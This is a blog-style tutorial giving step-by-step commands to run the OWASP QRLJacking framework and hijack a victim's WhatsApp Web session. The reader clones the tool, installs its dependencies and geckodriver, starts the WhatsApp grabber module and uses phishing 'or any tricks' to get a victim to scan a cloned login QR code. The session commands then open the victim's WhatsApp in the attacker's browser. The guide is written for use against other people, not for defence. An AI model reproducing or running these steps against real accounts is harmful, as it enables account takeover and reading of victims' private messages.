What's App Hijacking

QR code (abbreviated from Quick Response Code) is the trademark for a type of matrix barcode, QRLJacking or Quick Response Code Login Jacking is a simple social engineering attack vector capable of session hijacking affecting all applications that rely on the “Login with QR code” feature as a secure way to login into accounts.

In a nutshell, the victim scans the attacker’s QR code which results in session hijacking. where we will steal all the requirements for a Whats Web app Application to load

Overview
  1. The attacker initializes a client-side QR session and clones the Login QR Code into a phishing website “Now a well-crafted phishing page with a valid and regularly updated QR Code is ready to be sent to a Victim.”

Installation Process:

Requirements:

  • Linux or MAC OS

Step 1: Download/Clone The QRL jacking framework from Github

Command: git clone https://github.com/OWASP/QRLJacking.git

you can also download the zip and extract it.

Move into the directory by using

Step 2: Install all the required modules using pip

pip is a package management system written in Python used to install and manage software packages

Command: python3 -m pip install -r requirement.txt

Step 3: Install Gecko driver

This program provides the HTTP API described by the WebDriver protocol. to communicate with Gecko browsers, such as Firefox.

Install the latest geckodriver from https://github.com/mozilla/geckodriver/releases

Let's automate things:

Commands:

  • wget https://github.com/mozilla/geckodriver/releases/download/v0. 29.1/geckodriver-v0.29.1-linux64.tar.gz

Step 4: Starting and configuring QRL Jacker

Starting QRL jacker script : python3 QrlJacker.py

the banner may vary from time to time ;)

Step 5: Configuring whats app module and listener

Commands:

  • use grabber/whatsapp

Step 6: Open Firefox and Scan the QR

Open your firerfox browser and type in http://host:port

  • http://127.0.0.1:2001
QR code that has to be scanned in WhatsApp App

Make sure that the victim scans the QR, you can use phishing or any tricks to deliver this QR to the victim

Step 7: After scanning and usage

I personally scanned this QR, after scanning you may get a message as shown below:

session has been saved successfully

Commands to interact and use

  • sessions

sessions command will help us to show the active connections available to interact

  • sessions -i 0

The sessions -i <number> will help us to interact with the session and opens the victim whats app directly on firefox

My whatsapp

I also recorded this part but the gecko installation part isn’t available in that recording G drive URL

You can explore this tool at:

Thank you very much for making up to here — Cyber might

Do follow @iamcybermight for more content